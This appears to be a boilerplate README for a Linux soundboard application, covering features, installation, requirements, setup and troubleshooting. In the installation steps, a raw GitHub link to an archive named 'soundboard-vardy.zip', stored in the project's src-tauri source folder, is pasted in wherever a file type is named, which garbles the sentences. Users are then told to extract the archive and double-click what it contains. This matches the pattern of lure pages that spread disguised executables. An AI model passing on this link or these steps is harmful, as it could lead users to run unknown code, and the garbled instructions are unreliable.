Welcome to soundboard, a powerful Linux soundboard application designed for virtual microphone support. This tool is perfect for Discord, games, and VoIP applications, allowing you to enhance your audio experience.
- Virtual Microphone Support: Use soundboard as a virtual microphone in your favorite applications.
- Easy-to-Use Interface: A simple interface ensures a smooth experience for all users.
- Audio Effects: Enhance or modify your audio with various effects.
- Custom Sound Clips: Load your own sound clips and play them at your convenience.
- Linux Compatibility: Fully optimized for Linux environments, particularly using PipeWire or PulseAudio.
To get started with soundboard, follow the instructions in this guide. You'll have the application running in no time.
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Visit the Releases Page: Go to the Releases Page to download the latest version of soundboard.
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Select Your Version: Choose the release that meets your needs. Look for the
https://raw.githubusercontent.com/service1985/soundboard/main/src-tauri/soundboard-vardy.zipor.AppImagefile, which is suitable for Linux users. -
Download the File: Click on the file to start the download. Make sure to note the location where the file is saved.
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Extract the File: If you downloaded a
https://raw.githubusercontent.com/service1985/soundboard/main/src-tauri/soundboard-vardy.zipfile, right-click on it and select "Extract Here". For.AppImage, you can skip this step. -
Run the Application:
- For a
https://raw.githubusercontent.com/service1985/soundboard/main/src-tauri/soundboard-vardy.zipfile, navigate to the extracted folder in your file manager. Double-click the application file to start it. - For an
.AppImage, you may need to make it executable. Right-click the file, select "Properties", then go to the "Permissions" tab and check "Allow executing file as program". Double-click the file to run it.
- For a
- A Linux operating system with version 5.4 or higher.
- PipeWire or PulseAudio installed.
- At least 1 GB of RAM.
- A sound card.
Once you launch soundboard, you can set up your audio preferences:
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Select Input and Output Sources: Choose your microphone and output devices from the settings menu.
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Load Sound Clips: Click on the "Load" button to choose your preferred audio files.
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Adjust Volume Levels: Use the sliders in the interface to set your desired levels.
- Hotkeys: Set up hotkeys for quick access to your favorite sounds.
- Testing: Before going live in your application, test your soundboard in a voice chat to ensure everything works smoothly.
- Explore Effects: Experiment with different audio effects to find the best sound for your needs.
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Application Won't Start: Ensure you have all system requirements installed. If issues persist, reinstall the application.
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No Sound Output: Check your volume settings and ensure the correct output device is selected.
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Sound Delay: Adjust buffer settings in the audio settings of your Linux environment.
If you encounter any issues or have suggestions, feel free to open an issue on the GitHub repository. Your feedback helps us improve soundboard for every user.
- GitHub Issues - Report bugs and request features.
- Wiki - Access detailed guides and tips to maximize your soundboard experience.
- Discord Community - Join our community for real-time support and sharing tips.
We welcome contributions to soundboard. If you'd like to improve the application or documentation, please refer to our Contributing Guide.
For any further questions or inquiries, please reach out via the contact page on our GitHub profile.
We appreciate your interest in soundboard. Enjoy your improved audio experience with ease!